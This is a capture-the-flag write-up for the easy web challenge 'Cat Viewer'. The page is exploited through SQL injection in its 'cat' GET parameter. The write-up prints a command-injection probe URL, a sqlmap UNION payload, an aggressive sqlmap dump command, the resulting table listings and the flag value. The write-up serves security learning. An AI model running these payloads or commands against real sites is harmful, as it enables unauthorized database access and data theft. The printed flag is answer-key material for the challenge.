---
layout: writeup

title: Cat Viewer
difficulty: easy
points: 268
categories: [web_exploitation]
tags: [sqli]

flag: 
  user: flag{a_sea_of_cats}

---
## Challenge
### Description
I built a little web site to search through my archive of cat photos. I hid a little something extra in the database too. See if you can find it!
https://nessus-catviewer.chals.io/ 

## Solution
We are presented with a sort of "cat search engine" in which we can search cat photos by the name of the cats (very cute!).

![Alt text](image.png)

We see that the search is performed via a GET parameter in the URL so, naturally, we will try to tamper it with unexpected input, maybe let's try sending a null character *%00* to see what happens

![Alt text](image-1.png)

```
https://nessus-catviewer.chals.io/index.php?cat=Shelton%00`sleep%20100`
```

OOPS! I was actually looking for remote code injection here but it seems like I got a SQLite error :D

I ran a few sqlmap commands til I got a working payload (it insisted in doing time based injection when a simple Union injection was clearly possible)

```bash
---
Parameter: cat (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: cat=Shelton" UNION ALL SELECT NULL,CHAR(113,107,112,98,113)||CHAR(110,115,107,105,73,67,75,100,100,111,84,75,82,83,103,99,69,83,87,76,111,114,122,86,118,100,118,86,106,122,113,78,87,73,85,66,84,67,113,120)||CHAR(113,113,113,112,113),NULL,NULL-- NcNj
---
```

I first got the columns and tables

```bash
[2 tables]
+-----------------+
| cats            |
| sqlite_sequence |
+-----------------+

[4 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| flag   | TEXT    |
| id     | INTEGER |
| image  | TEXT    |
| name   | TEXT    |
+--------+---------+
```

Then with the following command I got the flag

```bash
sqlmap 'https://nessus-catviewer.chals.io/index.php?cat=Shelton' --random-agent --technique=U --level 3 --risk 3 --tamper=space2comment -T cats -C flag --dump
```

```
Table: cats
[195 entries]
+---------------------+
| flag                |
+---------------------+
| flag{a_sea_of_cats} |
|
|
|
```
